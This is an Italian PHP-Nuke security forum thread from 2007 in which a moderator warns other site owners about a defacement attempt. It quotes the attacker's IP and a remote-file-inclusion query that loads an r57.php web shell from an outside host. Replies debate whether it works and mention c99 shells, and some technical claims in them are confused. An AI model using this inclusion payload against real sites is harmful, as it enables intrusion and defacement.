. ::  Vendi downloads con Disposable Links  ::  PRO Nuke Forms  ::  Ts Members 2.1  ::  Rilasciato Content Plus 2.2.1  ::  Nuke Debuggeer ::.
Benvenuto su PHP-Nukefordonkeys.com Donkeys76 Mercatino 1200Temi Manuale
 
Benvenuto su PHP-Nukefordonkeys.com

  Iscriviti! E' Gratis!                                                                                                   
La Tua WebAgency


Menu Generale
Home
News
Mappa del Sito
Recensioni
Trova Tutto
Utenti
Forums
Downloads
Contatti
Promo Tuo Sito
Tutorials
Speciali
Manuali
PHPNuke Tools
Utility
Gallerie
Nuke Shopping
Documenti

Recensioni Siti
· MemHT Portal
· Web Agency
· Calcio
· Dieta
· Giochi
· Gossip - SMS
· Investimenti
· Ricette cucina

**************
·casino online
·Sfrutta meglio il web
·Prestito auto

Consigliati



PHP-Nukefordonkeys.com: Forums

Phpnukefordonkeys.com :: Leggi il Topic - Cercasi disperatamente Lamers
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

Cercasi disperatamente Lamers

 
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza PHP-Nuke
Precedente :: Successivo  
Autore Messaggio
_-PaKi-_
Moderatore
Moderatore


Registrato: May 16, 2005
Messaggi: 389
Località: Milano

MessaggioInviato: 02-05-2007 20:55    Oggetto: Cercasi disperatamente Lamers Rispondi citando

Visto che di lamer al mondo ve ne sono un infinità voglio consigliarvi di fare attenzione, da ieri il mio portale è stato preso di mira da un lamer che nonostante venga bannato e bloccato dal sentinel, continua a tentare un defaciement, qui di seguito allego i dati per permettere a tutti voi di bannare questo ip o range Smile

Ip:64.50.192.206
query di attacco: www.phpnukeisland.com///modules.php?name=http://secretagent.by.ru/r57.php
Wink


Torna in cima
Profilo Messaggio privato Invia email HomePage
ballacoilupi70
Newbie
Newbie


Registrato: Jan 24, 2006
Messaggi: 191

MessaggioInviato: 03-05-2007 09:37    Oggetto: Re: Cercasi disperatamente Lamers Rispondi citando

_-PaKi-_ ha scritto:

Ip:64.50.192.206
query di attacco: www.phpnukeisland.com///modules.php?name=http://secretagent.by.ru/r57.php
Wink


Anche il mio sito è ultimamente attaccato da personaggi che scrivono nel Guestbook innumerevoli link a siti poco consigliati Crying or Very sad
Li ho bloccati con Sentinel specificando di bloccare l'IP ma nisba!

Una domanda: ma se l'indirizzo IP è dinamico cioè cambia ad ogni connessione a cosa serve bloccare un utente tramite IP?

Forse è solo mia ignoranza ma non comprendo a cosa serva Crying or Very sad

Perche' tenere fermo in casa cio' che puo' essere utile a tutti? Visita www.mettincircolo.it
Torna in cima
Profilo Messaggio privato HomePage
Marck92
Newbie
Newbie


Registrato: Jul 21, 2006
Messaggi: 32

MessaggioInviato: 03-05-2007 15:03    Oggetto: Rispondi citando

quella query di attacco non credo serva a nulla e non credo nenache che sia un "grande lamer" perchè è un metodo di inclusione che se mai dovesse funzionare, lui vedrà l'ftp del suo sito e non del tuo.. non è un metodo valido per fare attacchi..
Torna in cima
Profilo Messaggio privato HomePage
_-PaKi-_
Moderatore
Moderatore


Registrato: May 16, 2005
Messaggi: 389
Località: Milano

MessaggioInviato: 03-05-2007 18:09    Oggetto: Rispondi citando

caro mark quel tipo di attacco purtroppo è definito in gergo spoffing, con tale attacco è impossibile individuare l'ip almeno in maniera veloce, forse con un tracer puntiglioso e ben preciso si potrebbe risalire al fesso, per quanto riguarda il discorso che non serve a nulla, questo dipende dal tipo di script che tenta di richiamare in fase di attacco, mi riferisco al file r57.php, questa tecnica è ben conosciuta, si inserisce uno script maligno su un server bucato e iddato, cosi tale file sarebbe difficile trovare da parte del vero amministratore, sicuramente tale Lamer avrà anche rottato il server, dico lamer perchè nel comando che viene lanciato pare ci sia un errore di scrittura Laughing
Cmq credimi visto che sono del mestiere il 90% di idioti che si divertono a defacciare portali nuke sono lamer che imposessati di script reperibili dalla rete o scambiati con altri amici, l'unica cosa che sanno fare è l'anciare un comando da console, mi piacerebbe vedere questi piccoli idioti dentro un server loggato in via remota come si comporterebbero Wink


Torna in cima
Profilo Messaggio privato Invia email HomePage
Marck92
Newbie
Newbie


Registrato: Jul 21, 2006
Messaggi: 32

MessaggioInviato: 04-05-2007 00:56    Oggetto: Rispondi citando

ma guarda che avrà usato qualcosa tipo uno shell c99 per ad esempio accedere all'ftp ma il file deve risiedere sul server del sito altrimenti ti buca l'ftp di dove è caricato.. io per questo dico che il lamer mi sembra un po fesso.. perchè ha tentato di includere la pagina così.. e non sfruttando l'ip di quel server.. solo così si ovvia al problema che legge i file del server di dove è caricato.. se poi è uno script completamente differente dal tipo shell c99 questo non si può sapere dato che dal titolo non ti dice un granchè..
Torna in cima
Profilo Messaggio privato HomePage
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza PHP-Nuke Tutti i fusi orari sono GMT + 2 ore
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum



Powered by phpBB © 2001 - 2007 phpBB Group
Forums ©


Credit Card Consolidation - Credit Cards - Renegade Motorhomes - Loans
Siti consigliati: Weblord - Tiempolibresite - jugo- pcprimipassi - aliek - tweakness - Script e Manuali - net-free - Manuali - HardwareMax - Web Promotion - Directory - Tuttosoft.it - GBComputer - Computerxtreme
Network: PHP Nuke Maximus - 1 Million Free Games - 1 Million Nuke Pixel - Corvoingordo - Ingegneria Gestionale - Torre del Greco

Generazione pagina: 1.61 Secondi